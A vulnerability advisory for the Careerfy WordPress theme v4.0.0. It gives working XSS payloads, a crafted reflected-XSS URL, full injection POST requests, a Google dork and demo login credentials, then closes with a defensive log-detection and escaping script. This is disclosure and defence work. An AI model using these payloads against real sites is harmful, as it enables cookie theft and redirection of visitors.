Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities

2020.07.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-05
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 4.0.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79

### [ Info: ]

[i] An Unauthenticated Reflected XSS and multiple Authenticated Persistent XSS vulnerabilities were discovered in the Careerfy Job Board theme v4.0.0 for WordPress.
[i] The Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.
[i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password)
[i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password)
[i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/
[i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/
[i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc-2/

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?sector_cat=[payload]
[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable field: Full Address)
[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Dial Code, Full Address)
[x] Authenticated Persistent XSS -> Job Page (vulnerable field: Full Address)

### [ Payload: ]

[$] 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>

### [ PoC Unauthenticated Reflected XSS: ]

[!] https://careerfy.net/careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E

[!] GET /careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E HTTP/1.1
Host: careerfy.net

### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------42351733583489166030977870308
Content-Length: 4754
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_phone"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="dial_code"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_sector"

39
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

Vlad Vector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_bio"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="academic-level"

masters-degree
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="Age"

23` -- 27-years
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="salary"

31337
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="gender"

male1
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="industry"

hack' -- ing
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------42351733583489166030977870308--

### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------22074218576675900842109481301
Content-Length: 5617
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="display_name"

Vlad Vector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_phone"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="dial_code"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_website"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_sector"

34
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_dd"

5
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_bio"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="founded-since"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_title[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_google[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_description[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------22074218576675900842109481301--

### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /careerbooster/user-dashboard/?tab=user-job HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------2947472569940564910711066421
Content-Length: 4254
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job
Cookie: [cookies_here]

-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="application_deadline"

15-07-2020 19:04:42
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_sector"

34
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_type"

20
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="get_job_skills[]"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_type"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_url"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_email"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_max_salary"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="offered-salary"

31337
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="career-level"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="experience"

2-years
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="gender"

male
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="Industry"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="qualifications"

hacking\ 'skills
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="--><img src=x onerror=(alert)(document.cookie)//">1 "><svg/onload=';alert(`VL?DV?CTOR`);window.location=`https://twitter.com/vlad_vector`;'>
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------2947472569940564910711066421--

### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
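The following Python script is an added defender-side example and is not part of the advisory or of the Careerfy theme's code. It covers the reflected XSS in /jobs-listing/?sector_cat= described above from two angles: a log check that flags requests whose sector_cat value is not the plain numeric category id the theme appears to expect (an assumption drawn from the PoC URLs, which prepend the payload to the id 1), and the output-side fix, escaping the reflected value for the HTML attribute it is assumed to land in (the leading quote in the advisory's payload is what breaks out of such an attribute), the same transformation WordPress's esc_attr() applies. The access-log lines are constructed samples in common log format; the second and fourth carry XSS-style values in the query string.

```python
"""Added example (not from the advisory): detection and escaping checks for
the reflected XSS via /careerbooster/jobs-listing/?sector_cat=... in
Careerfy v4.0.0.  Assumptions: sector_cat is a numeric category id, and the
theme reflects it inside an HTML attribute value."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format).  Lines 2 and 4
# carry percent-encoded HTML in sector_cat; lines 1 and 3 are normal traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Jul/2020:19:01:02 +0000] "GET /careerbooster/jobs-listing/?sector_cat=1 HTTP/1.1" 200 18210
203.0.113.11 - - [05/Jul/2020:19:01:40 +0000] "GET /careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 18455
203.0.113.12 - - [05/Jul/2020:19:02:13 +0000] "GET /careerbooster/jobs-listing/?sector_cat=39&page=2 HTTP/1.1" 200 18100
203.0.113.13 - - [05/Jul/2020:19:03:55 +0000] "GET /careerbooster/jobs-listing/?sector_cat=%3Csvg/onload=alert(1)%3E HTTP/1.1" 200 18455
"""

# ip, timestamp, method and request target from a common-log-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Assumed contract for the parameter: a category id, i.e. digits only.
EXPECTED_SECTOR_CAT = re.compile(r'^\d+$')


def find_suspicious_sector_cat(log_text):
    """Return (client_ip, decoded_value) for every request whose sector_cat
    value is not a plain integer.  parse_qs percent-decodes for us, so the
    comparison is made on what the theme would actually reflect."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        params = parse_qs(query, keep_blank_values=True)
        for value in params.get('sector_cat', []):
            if not EXPECTED_SECTOR_CAT.match(value):
                hits.append((m.group('ip'), value))
    return hits


def render_sector_cat(value):
    """Reflect the value into an attribute the safe way: escape for the
    attribute context with quotes included (html.escape(quote=True) does
    what WordPress's esc_attr() does for this purpose), so a leading '"'
    in the input can no longer terminate the attribute."""
    return '<input type="hidden" name="sector_cat" value="%s">' % html.escape(value, quote=True)


def render_sector_cat_unescaped(value):
    """The defective pattern for comparison only: raw interpolation."""
    return '<input type="hidden" name="sector_cat" value="%s">' % value


def is_inert(markup):
    """True when the markup still contains exactly the one tag we emitted,
    i.e. the reflected value did not introduce any element of its own."""
    return markup.count('<') == 1 and markup.count('>') == 1


if __name__ == '__main__':
    for ip, value in find_suspicious_sector_cat(SAMPLE_LOG):
        print('suspicious sector_cat from %s: %r' % (ip, value))
    sample = '1"--><!--<img src="-->"><img src=x onerror=alert(1)>'
    print('escaped  :', render_sector_cat(sample))
    print('unescaped:', render_sector_cat_unescaped(sample))
```

The same two controls apply to the stored variants listed in the advisory (Full Address and Dial Code on the profile and job forms): validate on input with WordPress's sanitize_text_field() and escape on output with esc_attr() or esc_html() according to where the value is printed, rather than trusting that a dashboard form is only reachable by well-behaved users.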

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-05-careerfy-job-board-wordpress-theme-v4-0-0.txt
https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053

